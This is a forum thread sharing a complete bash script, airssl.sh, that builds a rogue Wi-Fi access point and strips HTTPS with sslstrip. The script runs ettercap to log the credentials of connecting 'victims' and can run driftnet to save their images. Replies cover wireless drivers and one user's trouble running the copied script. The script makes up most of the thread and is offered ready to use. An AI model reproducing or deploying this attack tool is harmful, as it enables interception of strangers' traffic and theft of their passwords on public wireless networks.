NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

[spudgunman]

I still dont have DHCP working but I did hack this script up a bit as well.. hope you like my modifications

the biggest thing I wanted to add was a --cleanup process so that it no longer messed things up for me while trying to troubleshoot the DHCP issue. I assume my problem is something with my wireless drivers and injection even if it works else where.. dont know yet.

Code:

#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - SpudGunMan 2010
# airssl.sh - v1.2
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
## set the subnet for DHCP handed out to the FAKEAP Wireless CLients
fakeAPnet=10.0.0.0 #network for dhcp
fakeAPSubnetMask=255.255.255.0 #subnet for dhcp
fakeAPat0Address=10.0.0.1 #the interface address and gateway for the fakeAP dhcp
fakeAPdns=8.8.8.8 #a valid DNS server
fakeAPrange="10.0.0.20 10.0.0.50" #string for the range

CleanUp ()
{
echo
echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Check if clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
rm -f airssl-cleanup
exit
}

initalize(){
# Network questions
echo
echo "===========Internet Connection Information========="
route -n -A inet | grep UG
echo "====Airmon Check Output (Should be no errors)======"
airmon-ng check
echo "====Airmon Output (FakeAP Wireless Interface)======"
airmon-ng
echo
echo
read -r -p "Enter Default gateway IP address, this is listed above. example 192.168.1.254: " gatewayip
read -r -p "Enter interface connected to the internet, this is listed above. example wlan0: " internet_interface
read -r -p "Enter your interface to be used for the fake AP, for example wlan1: " fakeap_interface
fakeap=$fakeap_interface
read -r -p "Enter the ESSID you would like your rogue AP to be called: " ESSID
airmon-ng start $fakeap_interface
read -r -p "Enter interface for fake AP, after airmon-ng processing example mon0: " fakeap_interface
}
# Clean up command line
if [ "$1" = "--cleanup" ] ; then
echo "[+] Previous Job Settings will be used"
. airssl-cleanup
CleanUp
elif [ "$1" != "" ]; then
echo
echo "Fake AP with SSL Strip"
echo "to cleanup last job run airssl.sh --cleanup"
exit
else
echo "Fake AP - SSL Strip"
fi
initalize
echo
echo "Default/Networks Gateway: "$gatewayip
echo "Default/Networks Gateway Interface: "$internet_interface
echo "FakeAP ESSID: "$ESSID
echo "FakeAP Fake Interface: "$fakeap_interface
echo
echo 
read -r -n 1 -p "Is this information correct? (y/n)" ANSWER
if [ $ANSWER = "y" ] ; then
echo "[+] Settings will be used"
else
echo "[+] airmon cleanup"
airmon-ng stop $fakeap_interface
initalize
fi

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet $fakeAPnet netmask $fakeAPSubnetMask {
option routers $fakeAPat0Address;
option subnet-mask $fakeAPSubnetMask;

option domain-name "\"$ESSID\"";
option domain-name-servers $fakeAPdns;

range $fakeAPrange;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
read -r -n 1 -p "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches, would you like Airbase to clone ALL probe requests
choose n if your are unsure... y or n or (a)All?" ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring interface and clear tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 $fakeAPat0Address netmask $fakeAPSubnetMask
ifconfig at0 mtu 1400
route add -net $fakeAPnet netmask $fakeAPSubnetMask gw $fakeAPat0Address
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
sleep 10

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Configuring sslstrip..."
read -r -n 1 -p "Would you like to Start SSLstrip?, y or n " STRIP
echo
if [ $STRIP = "y" ] ; then
echo "[+] Configuring iptables for sslstrip..."
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
else
echo "[+] Configuring iptables without sslstrip..."
iptables -X
iptables -F
iptables -A FORWARD -i at0 -o $internet_interface -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
fi

# Ettercap
echo "[+] Configuring ettercap..."
echo
read -r -n 1 -p "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose n, y or n " ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here. 
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
read -r -n 1 -p "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), y or n " DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi


if [ $STRIP = "y" ] ; then
echo "[+] Starting sslstrip logging..."
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
sleep 2
fi


clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials 
will be displayed in ettercap. You may use right/left mouse buttons 
to scroll up/down ettercaps xterm shell, ettercap will also save its output 
to /pentest/wireless/airssl/passwords unless you stated otherwise. 
Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo
echo "After you have finished please close airssl and clean up properly by hitting y"
echo "if airssl is not cleaned up properly ERRORS WILL OCCUR"
echo "otherwise you can clean up later with the airssl --cleanup command"
read -r -n 1 -p "(press y to cleanup now)" WISH

# Clean up
if [ "$WISH" = "y" ] ; then
CleanUp
else
save=$'\n'
echo -n "#cleanup process information"$'\n' > airssl-cleanup
echo -n "fakeapid="$fakeapid$'\n' >> airssl-cleanup
echo -n "dchpid="$dchpid$'\n' >> airssl-cleanup
echo -n "sslstripid="$sslstripid$'\n' >> airssl-cleanup
echo -n "ettercapid="$ettercapid$'\n' >> airssl-cleanup
echo -n "dritnetid="$dritnetid$'\n' >> airssl-cleanup
echo -n "sslstriplogid="$sslstriplogid$'\n' >> airssl-cleanup
echo -n "fakeap_interface="$fakeap_interface$'\n' >> airssl-cleanup
echo -n "fakeap="$fakeap$'\n' >> airssl-cleanup
fi

exit

[g60jon]

Just tested your version of the script and DHCP seems to work fine on my test hardware. I will give the whole script a try and see if its easier to work with than my current one.

J

[spudgunman]

can I ask what wireless card/drivers you use? I have found info along these lines Debian User Forums • View topic - ath5k droping packets that indicate its just my wireless drivers that are causing the failure

[g60jon]

Working on a Dell Latitude D420.

Got the following internal interfaces, i use these to connect to the internet:
iwl3945: Intel(R) PRO/Wireless 3945ABG/BG - Internal Wireless
Tigon3 [partno(BCM5752KFBG) rev 6002] (PCI Express) - Internal Wired LAN

Then I have the following PC-Cards (use these for scanning/injection):

• Netgear WG511T - Atheros chipset
• Generic PCMCIA Wireless card i have had for years, no idea what it is though. DMESG shows the
  following on insertion for the 2 cards:

Code:

pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0
pci 0000:03:00.0: reg 10: [mem 0x00000000-0x00001fff]
pci 0000:03:00.0: supports D1 D2
pci 0000:03:00.0: PME# supported from D0 D1 D2 D3hot D3cold
pci 0000:03:00.0: PME# disabled
pci 0000:03:00.0: BAR 0: assigned [mem 0x68000000-0x68001fff]
pci 0000:03:00.0: BAR 0: set to [mem 0x68000000-0x68001fff] (PCI address [0x68000000-0x68001fff]
p54pci 0000:03:00.0: enabling device (0000 -> 0002)
p54pci 0000:03:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
p54pci 0000:03:00.0: setting latency timer to 64
p54pci 0000:03:00.0: firmware: requesting isl3886pci
phy3: p54 detected a LM86 firmware
p54: rx_mtu reduced from 3240 to 2376
phy3: FW rev 2.13.12.0 - Softmac protocol 5.9
phy3: cryptographic accelerator WEP:YES, TKIP:YES, CCMP:YES
phy3: hwaddr 00:e0:98:b4:2b:3b, MAC:isl3890 RF:Frisbee
phy3: Selected rate control algorithm 'minstrel'
Registered led device: p54-phy3::assoc
Registered led device: p54-phy3::tx
Registered led device: p54-phy3::rx
Registered led device: p54-phy3::radio
p54pci 0000:03:00.0: is registered as 'phy3'

Code:

pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0
pci 0000:03:00.0: reg 10: [mem 0x00000000-0x0000ffff]
pci 0000:03:00.0: BAR 0: assigned [mem 0x68000000-0x6800ffff]
pci 0000:03:00.0: BAR 0: set to [mem 0x68000000-0x6800ffff] (PCI address [0x68000000-0x6800ffff]
ath5k 0000:03:00.0: enabling device (0000 -> 0002)
ath5k 0000:03:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
ath5k 0000:03:00.0: registered as 'phy4'
ath: EEPROM regdomain: 0x0
ath: EEPROM indicates default country code should be used
ath: doing EEPROM country->regdmn map search
ath: country maps to regdmn code: 0x3a
ath: Country alpha2 being used: US
ath: Regpair used: 0x3a
phy4: Selected rate control algorithm 'minstrel'
ath5k phy4: Atheros AR5212 chip found (MAC: 0x56, PHY: 0x41)
ath5k phy4: RF2112B 2GHz radio found (0x46)
cfg80211: Calling CRDA for country: US
cfg80211: Regulatory domain changed to country: US
    (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
    (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm)
    (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm)
    (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
    (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
    (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)

[killadaninja]

Update g60jon, and all. I have been trying for a while to get the r8187 driver to work properly when responding to all probes, but it created numerous other problems, in the end I decided the rtl8187 driver should be used. After coming to this thread to edit a few things and grab the script it appears g60jon had done pretty much what I wanted to do to the script (which has been turned in to airssl 2.0). Airssl 2.0 now uses rtl8187 which has added the use of responding to all probes "properly", the tutorial and script have been updated, and I have noted you g60jon.

[miata]

Hello GuyZ! I am trying to make the script by copying it and paste it in a notepad, but i am getting errors and "command not found"... I am sure that i make mistake into some line, but i cant get it working...
Can someone upload the working script somewhere, so i can download it?

Thanks in advance!

[sickness]

Hello GuyZ! I am trying to make the script by copying it and paste it in a notepad, but i am getting errors and "command not found"... I am sure that i make mistake into some line, but i cant get it working...
Can someone upload the working script somewhere, so i can download it?

Thanks in advance!

Notepad ? I think you should first get some basic knowledge than learn what the script actually does before you start playing with these things.

[miata]

In my Windows machine ( the one i am typing now), i paste the script into a notepad, then rename it to airssl.sh and then copy to my eee pc runing BT4 r2 live .
All i'd like (if possible) is the airssl.sh file to find out what i am doing wrong! ( chmod are done).

Thanks!

[sickness]

The script is in the second post, also without an exact error message no one will be able to help you.

[miata]

Got it working!

In BackTrack, i made a new text file and pasted the script from the one i made with notepad. It worked, although i couldn't find any difference...
Thanks and sorry for nagging!